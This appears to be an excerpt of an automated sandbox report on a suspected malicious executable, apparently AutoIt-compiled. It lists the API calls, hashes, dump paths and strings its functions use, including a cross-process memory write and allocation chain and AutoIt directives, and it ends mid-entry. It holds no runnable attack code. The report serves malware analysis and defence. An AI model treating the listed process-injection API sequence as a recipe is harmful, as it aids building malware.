                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: c39bbd742e3ae23b1bf95113c1bb4ecac39c3d3c45b65a00d675c0f45b8f4512
                                                                                                    • Instruction ID: 755911c0ae0b95c671ff4a2ab7f0f24ecc9145cfdcabaf408a538f302853cf6f
                                                                                                    • Opcode Fuzzy Hash: c39bbd742e3ae23b1bf95113c1bb4ecac39c3d3c45b65a00d675c0f45b8f4512
                                                                                                    • Instruction Fuzzy Hash: E201EE72800B019FCB30AF66E880842FBF9FF643053148A3FD1A252930C3B0A999CF84
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00ADD752
                                                                                                      • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                                                                                                      • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                                                                                                    • _free.LIBCMT ref: 00ADD764
                                                                                                    • _free.LIBCMT ref: 00ADD776
                                                                                                    • _free.LIBCMT ref: 00ADD788
                                                                                                    • _free.LIBCMT ref: 00ADD79A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 66ab9a0cfb7402804fd95cd45db0dfa22f41c7409606008875abadeb1b58bbdb
                                                                                                    • Instruction ID: 5e2360da156aa8fe7c8cb22b05ce717c8d25e723b2d966f529ca27d725ae0947
                                                                                                    • Opcode Fuzzy Hash: 66ab9a0cfb7402804fd95cd45db0dfa22f41c7409606008875abadeb1b58bbdb
                                                                                                    • Instruction Fuzzy Hash: D5F03632544204AB8625EB64FAC5D267BDDBB94750B940C47F09EE7781CB74FC80CB64
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00B05C58
                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B05C6F
                                                                                                    • MessageBeep.USER32(00000000), ref: 00B05C87
                                                                                                    • KillTimer.USER32(?,0000040A), ref: 00B05CA3
                                                                                                    • EndDialog.USER32(?,00000001), ref: 00B05CBD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3741023627-0
                                                                                                    • Opcode ID: 5120f64f02baf92bd14eeba76f555408d0eed5e682d497b10f36ed77d5376cd4
                                                                                                    • Instruction ID: f56ff2cfecac37cd53b6cf10396f1a066f08578c0f1d9861d8dbaf757d9b7dc0
                                                                                                    • Opcode Fuzzy Hash: 5120f64f02baf92bd14eeba76f555408d0eed5e682d497b10f36ed77d5376cd4
                                                                                                    • Instruction Fuzzy Hash: 9801FB31500B04ABFB315B50DE8EFAA7FA8EB04B45F141599A582A24E1DBB4A9848F90
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00AD22BE
                                                                                                      • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                                                                                                      • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                                                                                                    • _free.LIBCMT ref: 00AD22D0
                                                                                                    • _free.LIBCMT ref: 00AD22E3
                                                                                                    • _free.LIBCMT ref: 00AD22F4
                                                                                                    • _free.LIBCMT ref: 00AD2305
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 9ea776ef7fbcaa4476fe2890f9b55b3d590e652b4b784a63a64de2241f9f34fd
                                                                                                    • Instruction ID: 2ac0a475e415e6c523e48abe5af8690c76f95dda51972fe1eb95c8fb842db39b
                                                                                                    • Opcode Fuzzy Hash: 9ea776ef7fbcaa4476fe2890f9b55b3d590e652b4b784a63a64de2241f9f34fd
                                                                                                    • Instruction Fuzzy Hash: C8F03AB18101208F8622BF68BD11A683FA4B778760700094BF41AD73B2CF740891FBA4
                                                                                                    APIs
                                                                                                    • EndPath.GDI32(?), ref: 00AB95D4
                                                                                                    • StrokeAndFillPath.GDI32(?,?,00AF71F7,00000000,?,?,?), ref: 00AB95F0
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00AB9603
                                                                                                    • DeleteObject.GDI32 ref: 00AB9616
                                                                                                    • StrokePath.GDI32(?), ref: 00AB9631
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                    • String ID:
                                                                                                    • API String ID: 2625713937-0
                                                                                                    • Opcode ID: 2a7cefe96edfff1e052ce37b9988dfb2f9db8c254e400dee032d2aed9866e059
                                                                                                    • Instruction ID: 1ce0757963b7c014628822a71ef7c0e40d138449d236fbe02914cd6b0965b9ed
                                                                                                    • Opcode Fuzzy Hash: 2a7cefe96edfff1e052ce37b9988dfb2f9db8c254e400dee032d2aed9866e059
                                                                                                    • Instruction Fuzzy Hash: 78F0B631005644EBDB265FADED187A97F65AB01322F148614E66A660F2CF308997DF20
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __freea$_free
                                                                                                    • String ID: a/p$am/pm
                                                                                                    • API String ID: 3432400110-3206640213
                                                                                                    • Opcode ID: 4e4d5394e595068a5e48becf6627032d189b366139d6e9935c9a534385d10058
                                                                                                    • Instruction ID: 14f94ea2cf28f25464f0d1c2fd10fb1c8c20ddc492500320847321e6947d5e0c
                                                                                                    • Opcode Fuzzy Hash: 4e4d5394e595068a5e48becf6627032d189b366139d6e9935c9a534385d10058
                                                                                                    • Instruction Fuzzy Hash: A8D1F031900206EADB689F68C989BFAB7B1EF05700F28426BE9079F751D3759D80CB91
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AC0242: EnterCriticalSection.KERNEL32(00B7070C,00B71884,?,?,00AB198B,00B72518,?,?,?,00AA12F9,00000000), ref: 00AC024D
                                                                                                      • Part of subcall function 00AC0242: LeaveCriticalSection.KERNEL32(00B7070C,?,00AB198B,00B72518,?,?,?,00AA12F9,00000000), ref: 00AC028A
                                                                                                      • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                                                                                                      • Part of subcall function 00AC00A3: __onexit.LIBCMT ref: 00AC00A9
                                                                                                    • __Init_thread_footer.LIBCMT ref: 00B27BFB
                                                                                                      • Part of subcall function 00AC01F8: EnterCriticalSection.KERNEL32(00B7070C,?,?,00AB8747,00B72514), ref: 00AC0202
                                                                                                      • Part of subcall function 00AC01F8: LeaveCriticalSection.KERNEL32(00B7070C,?,00AB8747,00B72514), ref: 00AC0235
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                    • String ID: 5$G$Variable must be of type 'Object'.
                                                                                                    • API String ID: 535116098-3733170431
                                                                                                    • Opcode ID: 27d5f75640a65c8f487aba3f7f489f04a6ec1aa98af4bff7f312e5d095fa963e
                                                                                                    • Instruction ID: f1a214c85a3064e782589bdb183afa5db492d522fdb668a20c1756f81c97dc88
                                                                                                    • Opcode Fuzzy Hash: 27d5f75640a65c8f487aba3f7f489f04a6ec1aa98af4bff7f312e5d095fa963e
                                                                                                    • Instruction Fuzzy Hash: 3D919E70A44219EFCB14EF94E990DADB7F1FF49340F108099F80A6B2A2DB31AE41CB55
                                                                                                    APIs
                                                                                                      • Part of subcall function 00B0B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B021D0,?,?,00000034,00000800,?,00000034), ref: 00B0B42D
                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B02760
                                                                                                      • Part of subcall function 00B0B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B021FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00B0B3F8
                                                                                                      • Part of subcall function 00B0B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00B0B355
                                                                                                      • Part of subcall function 00B0B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B02194,00000034,?,?,00001004,00000000,00000000), ref: 00B0B365
                                                                                                      • Part of subcall function 00B0B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B02194,00000034,?,?,00001004,00000000,00000000), ref: 00B0B37B
                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B027CD
                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B0281A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                    • String ID: @
                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                    • Opcode ID: fdd48bb80db5a5290575e8bdfce70db1beebf170314ffb9bf7721165eadf36c7
                                                                                                    • Instruction ID: 357e3fe2aee6a53a5459dca160670608ca2b77766ff78c4819a080f5b5fc8819
                                                                                                    • Opcode Fuzzy Hash: fdd48bb80db5a5290575e8bdfce70db1beebf170314ffb9bf7721165eadf36c7
                                                                                                    • Instruction Fuzzy Hash: 7E41EB76900218AFDB10DFA4CD46EEEBBB8EF09700F108095FA55B7191DB716E49CBA1
                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\oagkiAhXgZ.exe,00000104), ref: 00AD1769
                                                                                                    • _free.LIBCMT ref: 00AD1834
                                                                                                    • _free.LIBCMT ref: 00AD183E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$FileModuleName
                                                                                                    • String ID: C:\Users\user\Desktop\oagkiAhXgZ.exe
                                                                                                    • API String ID: 2506810119-3755894309
                                                                                                    • Opcode ID: deafea1c00ed99ed810e23e65adcde30bd0e328e1731a0f26bde168b7d6c42fe
                                                                                                    • Instruction ID: 4410268bc959d563fa023d2025b4fbfe26ebdc19dcc157895ebc05152ab91525
                                                                                                    • Opcode Fuzzy Hash: deafea1c00ed99ed810e23e65adcde30bd0e328e1731a0f26bde168b7d6c42fe
                                                                                                    • Instruction Fuzzy Hash: 11316E75A00218BFDB21DB99D985D9EBBFCEB95310B1441A7F806D7321DA708E80DBA0
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B0C306
                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00B0C34C
                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B71990,015C5520), ref: 00B0C395
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 135850232-4108050209
                                                                                                    • Opcode ID: e6f6d05b97cf3a773d8c0821cafea4e367f7346507f69f92f8aeffc6f9c14199
                                                                                                    • Instruction ID: a6b6bd5a3c21b4808a24be65918b4e207cc90b73be098e1057cc0bc476d3b6a2
                                                                                                    • Opcode Fuzzy Hash: e6f6d05b97cf3a773d8c0821cafea4e367f7346507f69f92f8aeffc6f9c14199
                                                                                                    • Instruction Fuzzy Hash: F5418E312043019FD720DF25D885B5ABFE4EF85360F148B9DF9A5972D2DB30A904CB66
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B3CC08,00000000,?,?,?,?), ref: 00B344AA
                                                                                                    • GetWindowLongW.USER32 ref: 00B344C7
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B344D7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long
                                                                                                    • String ID: SysTreeView32
                                                                                                    • API String ID: 847901565-1698111956
                                                                                                    • Opcode ID: 3b97133095614dec1498e9ae1cf71a88c30836c924ca0a0054bfe3126cfa12ee
                                                                                                    • Instruction ID: a6ae8271684213eb9a162112d64250ccbfd13840d0c099dc2cdba9bb95fd6ee4
                                                                                                    • Opcode Fuzzy Hash: 3b97133095614dec1498e9ae1cf71a88c30836c924ca0a0054bfe3126cfa12ee
                                                                                                    • Instruction Fuzzy Hash: 29317A32210605ABDB209E78DC45BEA7BA9EB09324F314765F979A32E1DB70EC509B50
                                                                                                    APIs
                                                                                                      • Part of subcall function 00B2335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00B23077,?,?), ref: 00B23378
                                                                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B2307A
                                                                                                    • _wcslen.LIBCMT ref: 00B2309B
                                                                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00B23106
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                    • String ID: 255.255.255.255
                                                                                                    • API String ID: 946324512-2422070025
                                                                                                    • Opcode ID: 90a009e40daaf348951560aeeea3cb39e1ebbb6150eae2b12b0ac4ecb6db92f1
                                                                                                    • Instruction ID: 00e8e479f67fac034b68db2fcf4ebfb100984c38b5561a377fb99da998882f8d
                                                                                                    • Opcode Fuzzy Hash: 90a009e40daaf348951560aeeea3cb39e1ebbb6150eae2b12b0ac4ecb6db92f1
                                                                                                    • Instruction Fuzzy Hash: C131F3392002219FCB10CF68D586FAA77E0EF14718F248099E8199B392CB3AEF41C770
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B34705
                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B34713
                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B3471A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                    • String ID: msctls_updown32
                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                    • Opcode ID: 5f09a37cf29e9105cebd25b24352c8a863b182c88fb63cfa9b442ced9c2382ef
                                                                                                    • Instruction ID: 2e815d4b9ed2d0562351274e688b4677be74f74a5424f697d2a4cdaef2dfe3d9
                                                                                                    • Opcode Fuzzy Hash: 5f09a37cf29e9105cebd25b24352c8a863b182c88fb63cfa9b442ced9c2382ef
                                                                                                    • Instruction Fuzzy Hash: 08214CB5600208AFDB10DF68DC81DAA37EDEB5A3A4B140499FA059B291CB70FC52CA60
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                    • API String ID: 176396367-2734436370
                                                                                                    • Opcode ID: e4f58c92f9fe0c57b65f5e7141e6ea34cf82850e8652e2c4459714617006c5ac
                                                                                                    • Instruction ID: 49f23dc81f8686a6fc344ffdea7b474c6cfbbb85b2bec0650d46455f8baf50ed
                                                                                                    • Opcode Fuzzy Hash: e4f58c92f9fe0c57b65f5e7141e6ea34cf82850e8652e2c4459714617006c5ac
                                                                                                    • Instruction Fuzzy Hash: B02157722046116AD331BB259D42FBBBBD8EFA5300F14406AF949970C3EB66ED41C3D5
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B33840
                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B33850
                                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B33876
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                    • String ID: Listbox
                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                    • Opcode ID: 2112801a539cdb9e4d5cbe19b0ca1418a930435dc3b23b4419dcd9986a877fd1
